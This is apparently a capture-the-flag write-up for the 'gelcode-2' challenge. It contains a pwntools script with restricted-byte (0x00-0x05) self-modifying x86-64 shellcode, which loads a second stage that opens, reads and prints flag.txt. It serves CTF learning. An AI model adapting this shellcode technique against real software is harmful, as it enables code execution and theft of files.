Tags: shellcode 

Rating:

The challenge has two main limits.
First: the user is limited to bytes between 00-05
Second: the length of your shellcode increases the longer the challenge went unsolved. It ended at 362 characters. I didn't complete this challenge until a couple hours after the ctf, but I was able to get my shellcode down to 222 bytes.

```
from pwn import *

p = process(['./gelcode-2','362'])

gdb.attach(p)

shellcode = '''
/*mov eax, 0x358d48*/
/*lea rsi, [rip]*/
add [rip+3], al
add eax, 0x5050505
add eax, 0x5050505
add eax, 0x5050505
add eax, 0x5050505
add eax, 0x5050505
add eax, 0x5010505
add eax, 0x4050505

add eax, 0x00502
add [rip+1], al
add al, 0
add eax, 0x00500
add eax, 0x00500
add eax, 0x00300

add dword ptr [rip], eax
nop
nop
nop
nop
nop
add dword ptr [rip], eax
nop
nop
nop
nop
nop
nop
nop

/*mov edx, 0x503*/
add al, 5
add al, 5
add al, 5
add al, 5
mov [rip+1], al
add al, 2

mov byte ptr [rip], al

nop
add al, 5
nop
nop

/*mov edi, 0*/
/*add eax, 0x050505*/
add al, 5

mov byte ptr [rip], al
nop
nop
nop
nop
nop

/*syscall (try to zero out eax)*/

/*xor eax, eax; syscall*/
/*0x358dbf = start*/
/*050fc031 = target*/
mov byte ptr [rip+3], al
add eax, 0x4050505
add eax, 0x0050505
add eax, 0x0050505
add eax, 0x0050505
add eax, 0x0050505
add eax, 0x0020505
add eax, 0x0000505
add eax, 0x0000505
add eax, 0x000505
add eax, 0x000505
add eax, 0x0000105

add al, 5
add al, 5

add al, 5
add al, 5
add al, 5
add al, 5
add al, 4

add [rip+1], al
add al, 1

add [rip], eax
'''

shell = '''
mov rsp, rsi
call next
nop
nop
nop
nop
nop
nop
nop
nop
nop
next:
pop rdi
push 0
pop rsi
push 2
pop rax
syscall

xchg edi, eax
push 0
pop rax
mov rsi, rsp
mov rdx, 100
syscall

push 1
pop rax
push 1
pop rdi
syscall

'''

shell = asm(shell, arch='amd64')
shell = shell[:8] + "flag.txt\x00" + shell[8+9:]

shellcode = asm(shellcode ,arch='amd64')
print(len(shellcode))

p.sendline(shellcode.ljust(361,'\x00'))

p.sendline('\x90'*200 + shell)

p.interactive()

```